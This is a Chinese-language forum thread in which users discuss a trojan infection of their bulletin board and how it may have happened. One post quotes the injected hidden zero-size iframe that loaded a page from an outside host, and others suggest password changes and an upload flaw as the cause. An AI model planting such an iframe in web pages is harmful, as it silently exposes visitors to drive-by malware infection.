[有木馬]哈啦大大...

[ckmarkhsu]

引用:

作者: 哈啦

真是不好意思，我自己怎麼來來去去都沒有接到任何顯示警告呢？我現在是用卡巴斯基啊？

還好有徐同學ckmarkhsu的支援，不然我也不知該怎麼辦？
這些木馬到底是怎麼植入的？

恩 我必須要很誠實的說...

我道維太淺...真的不知道是怎樣被植入的Orz


哈拉大大太客氣了

我沒把您的論壇搞好學弟真是羞愧阿Orz...

[some]

可不可以先裝 那個白色的 樣版阿..

[adam]

<iframe src="http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>

請問您有在ie開啟網頁的原始檔嗎? 這串文字是放在那啊?

[coca]

哈拉兄，建議你將所有的ADMIN密碼全數更換，包含SQL的，然後找看看
有沒有跑其他的小程式。我換了VBB目前還沒中獎..@@

[heybye]

我的BBS已经感染过4次了。
这应当是一个Upload漏洞，利用上传扩展名为.jpg的病毒文件进行感染。

[licheng]

引用:

作者: adam

請問您有在ie開啟網頁的原始檔嗎? 這串文字是放在那啊?

應該是已經移除掉了。

當初 vincentliao 發文的時候，我有看了一下網頁原始碼，是有那些東西。

當時的瀏覽器是 Mozilla Firefox 1.0.4 英文版。

[ckmarkhsu]

引用:

作者: licheng

應該是已經移除掉了。

當初 vincentliao 發文的時候，我有看了一下網頁原始碼，是有那些東西。

當時的瀏覽器是 Mozilla Firefox 1.0.4 英文版。

恩 我移除掉的

總不能依直放著吧~"~

[kiang]

如果問題是出在同一台主機的其他帳號，那就真的沒輒了...

[vincentliao]

講出來大家可能打死不相信.
小弟電腦單純到連[防毒]/[Office]/[FTP]這些軟體都沒有.

記得好久以前的幾位電腦師父
[劉X淦]/[涂x誠]
他們教小弟的一些方法如何當管理系統者.
小弟受益良多.
提出來大家當一下參考.

a.把環境處理到最簡單的狀況,這樣您才可以抓到最難的問題.
b.絕對不用電子方式留下系統者的帳號與密碼.這些只能用當面與電話告知.
c.當有異樣發生時,一定要查出來,不然以後會更複雜.

PS1.: 小弟是看ADSL的訊號禿然亂閃,到[cntl]+[Alt]+[Del]多了一個job.
才查到有[木馬] ...
PS2.: [2005-05-12,22:33] ==) [2005-05-12,22:50]這段時間在首頁的使用者,您的 IE 已經被攻擊了,有可能已經種[木馬]了...

[vincentliao]

XP 預設就是用 IE.
自行線上掃一下毒了,因為小弟也中標了.

http://googol.name/index.php?showtopic=203
http://vbb3.twftp.org/showthread.php?t=5881